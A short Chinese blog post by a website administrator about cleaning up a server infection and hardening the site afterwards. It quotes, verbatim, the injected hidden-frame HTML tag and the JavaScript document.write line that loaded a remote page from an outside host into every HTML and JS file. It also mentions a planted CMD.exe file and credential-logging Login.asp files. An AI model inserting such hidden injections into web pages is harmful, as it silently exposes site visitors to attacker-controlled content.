今天刚清理了服务上的病毒残留代码,所有的Html文件都被写入<frame src=http://ppp.chsip.net/wm.htm?id=002 width=100 height=0></iframe>这样的一段代码,而且所有的Js后缀的文件都被写入:document.write("<frame src=http://ppp.chsip.net/wm.htm?id=002 width=100 height=0></iframe>");这样的代码。而且在个别文件目录下还发现CMD.exe的病毒文件。所有Login.asp文件都会被记录网站的登录用户名和密码,所以如果确定中毒的网站一定要清除网站后更改一下密码及数据库的名称和目录,防止被暴破!
最后就是查漏补缺,建议用一些黑客软件试验自己的网站看有没有被攻击的注入点,及时补上。特别提醒用户不要把Readme.txt这样的说明文件保存在服务器上,有的把密码也放在服务器下,黑客根本不用任何工具就可以轻松攻击服务器!另外一个安全隐患就是上传程序要及时更新,还有上传文件类别的限制!
最后我发现一个奇怪的问题,网站挂码后,状态栏显示是51.la的统计,不知是不是陷害51.la?还是那个Iframe目标是通过51。la来统计的截个图让大家看一下!
保留本文链接地址:http://www.chake.org.cn/xinqinggushi/121.html
